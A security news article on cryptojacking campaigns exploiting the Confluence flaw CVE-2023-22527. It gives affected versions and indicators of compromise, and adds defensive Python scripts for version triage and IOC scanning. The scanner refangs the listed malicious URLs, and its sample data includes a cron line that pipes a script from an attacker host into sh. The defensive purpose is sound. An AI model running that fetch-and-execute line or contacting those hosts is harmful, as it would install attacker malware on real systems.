
A critical template injection vulnerability in Atlassian Confluence Data Center and Confluence Server, which allows remote attackers to execute arbitrary code on vulnerable Confluence installs, is being actively exploited in cryptojacking campaigns.
The flaw, tracked as CVE-2023-22527 and rated with a CVSS score of 10, affects Confluence Data Center and Server versions 8.0.x, 8.1.x, 8.2.x, 8.3.x, 8.4.x, and 8.5.0 through 8.5.3. The most recent supported versions of Confluence Data Center and Server are not affected by this issue. Atlassian addressed the vulnerability in January 2024 with the release of versions 8.5.4 (LTS), 8.6.0 (Data Center only), and 8.7.1 (Data Center only).
Now, researchers from Trend Micro have observed this vulnerability being actively exploited for crypto mining. The attacks involve threat actors that deploy shell scripts and XMRig miners, target SSH endpoints, kill competing crypto mining processes, and maintain persistence via cron jobs.
At least three different threat actors are exploiting the flaw in crypto mining campaigns that use XMRig miners and SSH, and that rely on cron jobs to remain persistent throughout the campaign.
With CVE-2023-22527 under mass exploitation by threat actors, organizations worldwide face a significant security risk. To minimize the risks and threats associated with this vulnerability, administrators should update their Confluence Data Center and Confluence Server deployments to the latest available versions as soon as possible.
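The affected-version list above is easy to misread by hand when triaging a fleet, so here is an added example (not from the article or from Atlassian) that encodes exactly the ranges the advisory states, 8.0.x through 8.4.x and 8.5.0 through 8.5.3, and runs it over a constructed host inventory. Anything outside those ranges is reported only as "not in the stated affected list", not as safe; the inventory hostnames and versions are made up for the demonstration.

```python
import re
from typing import List, Optional, Tuple

# Fixed releases named in the advisory, kept for reference in triage output.
FIXED_VERSIONS = ("8.5.4", "8.6.0", "8.7.1")


def parse_version(version: str) -> Optional[Tuple[int, int, int]]:
    """Parse a dotted Confluence version such as '8.5.3' into (major, minor, patch)."""
    m = re.fullmatch(r"(\d+)\.(\d+)\.(\d+)", version.strip())
    if not m:
        return None
    major, minor, patch = (int(x) for x in m.groups())
    return (major, minor, patch)


def is_affected(version: str) -> bool:
    """True if the version falls inside the ranges the advisory lists for CVE-2023-22527."""
    parsed = parse_version(version)
    if parsed is None:
        raise ValueError(f"unrecognised Confluence version string: {version!r}")
    major, minor, patch = parsed
    if major != 8:
        return False
    if 0 <= minor <= 4:          # 8.0.x, 8.1.x, 8.2.x, 8.3.x, 8.4.x
        return True
    if minor == 5:               # 8.5.0 through 8.5.3 only
        return patch <= 3
    return False                 # 8.6.x, 8.7.x and later are not in the stated list


# Constructed inventory for the demonstration: (hostname, reported version).
SAMPLE_INVENTORY = [
    ("wiki-prod-01", "8.5.3"),
    ("wiki-prod-02", "8.5.4"),
    ("wiki-legacy", "8.2.0"),
    ("wiki-dc-01", "8.6.0"),
    ("wiki-old", "7.19.0"),
]


def triage(inventory: List[Tuple[str, str]]) -> List[Tuple[str, str, str]]:
    """Return (host, version, verdict) for every host; verdict is 'AFFECTED' or 'not in affected list'."""
    results = []
    for host, version in inventory:
        verdict = "AFFECTED" if is_affected(version) else "not in affected list"
        results.append((host, version, verdict))
    return results


if __name__ == "__main__":
    for host, version, verdict in triage(SAMPLE_INVENTORY):
        print(f"{host:14} {version:8} {verdict}")
    print("fixed releases per advisory:", ", ".join(FIXED_VERSIONS))
```

The verdict for a host outside the listed ranges deliberately says nothing more than that it is not on the list; whether a given later build is supported is something to confirm against Atlassian's own advisory, not against this script.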
Indicators of Compromise
- 5283CB0CC6F35423C9E41E1C3779B3F3
- B3BFC68DE683391E674ADA5CE72B584B
- A53A9CA8A074C7108F8412C3F8C1FC5D
- 2833C82055BF2D29C65CD9CF6684449A
- 2E32D010E8C85A608022B317E5CB1FA7
- hxxp[:]//45[.]144[.]3[.]216:10000/rnv2ymcl
- hxxp[:]//45[.]144[.]3[.]216:10000/starrail/config/v2.json
- hxxp[:]//45[.]144[.]3[.]216:10000/starrail/cbt2zip/setup.exe
- hxxp[:]//45[.]144[.]3[.]216:10000/solr.sh
- hxxp[:]//175[.]118[.]126[.]65:8002/js/l.txt
- hxxp[:]//95[.]85[.]93[.]196:80/h4
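The indicators above are defanged, so they cannot be pasted straight into a grep or a SIEM rule. The following added example (not part of the article or of Trend Micro's report) refangs the listed URLs, derives the hosts from them, and sweeps a handful of constructed log, cron and proxy lines plus a constructed file-hash inventory for hits. The sample lines and the file paths are made up; only the hashes and URLs come from the list above.

```python
import re
from typing import Dict, List, Tuple
from urllib.parse import urlsplit

# MD5 hashes exactly as listed in the advisory.
IOC_MD5 = {
    "5283CB0CC6F35423C9E41E1C3779B3F3",
    "B3BFC68DE683391E674ADA5CE72B584B",
    "A53A9CA8A074C7108F8412C3F8C1FC5D",
    "2833C82055BF2D29C65CD9CF6684449A",
    "2E32D010E8C85A608022B317E5CB1FA7",
}

# Defanged URLs exactly as listed in the advisory.
DEFANGED_URLS = [
    "hxxp[:]//45[.]144[.]3[.]216:10000/rnv2ymcl",
    "hxxp[:]//45[.]144[.]3[.]216:10000/starrail/config/v2.json",
    "hxxp[:]//45[.]144[.]3[.]216:10000/starrail/cbt2zip/setup.exe",
    "hxxp[:]//45[.]144[.]3[.]216:10000/solr.sh",
    "hxxp[:]//175[.]118[.]126[.]65:8002/js/l.txt",
    "hxxp[:]//95[.]85[.]93[.]196:80/h4",
]


def refang(indicator: str) -> str:
    """Undo the usual defanging ('hxxp', '[:]', '[.]') so the indicator matches raw log text."""
    s = indicator.strip().replace("[:]", ":").replace("[.]", ".")
    return re.sub(r"^hxxp", "http", s, flags=re.IGNORECASE)


IOC_URLS = [refang(u) for u in DEFANGED_URLS]
# Host-level indicators, so a new path on a known host still raises a hit.
IOC_HOSTS = sorted({urlsplit(u).hostname for u in IOC_URLS})


def scan_lines(lines: List[str]) -> List[Tuple[int, str, str]]:
    """Return (1-based line number, 'url' | 'host', matched indicator) for each line that hits.

    A full-URL match is reported in preference to a bare host match.
    """
    hits = []
    for n, line in enumerate(lines, start=1):
        for url in IOC_URLS:
            if url in line:
                hits.append((n, "url", url))
                break
        else:
            for host in IOC_HOSTS:
                if host in line:
                    hits.append((n, "host", host))
                    break
    return hits


def scan_hashes(inventory: Dict[str, str]) -> List[Tuple[str, str]]:
    """Match a {path: md5} inventory (e.g. from an EDR export) against the listed hashes."""
    return [(path, md5.upper()) for path, md5 in inventory.items() if md5.upper() in IOC_MD5]


# Constructed sample input: syslog, crontab, proxy and sshd lines.
SAMPLE_LINES = [
    "Jan 25 03:12:01 confluence CRON[1833]: (confluence) CMD (/tmp/.x/solr.sh)",
    "*/10 * * * * curl -fsSL http://45.144.3.216:10000/solr.sh | sh",
    "2024-01-25T03:13:44Z proxy GET http://175.118.126.65:8002/js/l.txt 200",
    "Jan 25 03:14:02 confluence sshd[1901]: Accepted publickey for confluence from 10.0.0.5 port 51422",
    "2024-01-25T03:20:10Z proxy GET http://95.85.93.196:80/update 200",
]

# Constructed file inventory; the path is invented and the second hash is MD5 of an empty file.
SAMPLE_INVENTORY = {
    "/opt/confluence-data/tmp/payload.bin": "2e32d010e8c85a608022b317e5cb1fa7",
    "/usr/bin/ls": "d41d8cd98f00b204e9800998ecf8427e",
}

if __name__ == "__main__":
    for n, kind, ioc in scan_lines(SAMPLE_LINES):
        print(f"line {n}: {kind} match on {ioc}")
    for path, md5 in scan_hashes(SAMPLE_INVENTORY):
        print(f"hash match: {path} {md5}")
```

Line 1 in the sample carries only a file name that happens to coincide with a listed path, which is deliberately not treated as a hit: file names are trivially renamed, while the host and hash indicators are what the list actually vouches for.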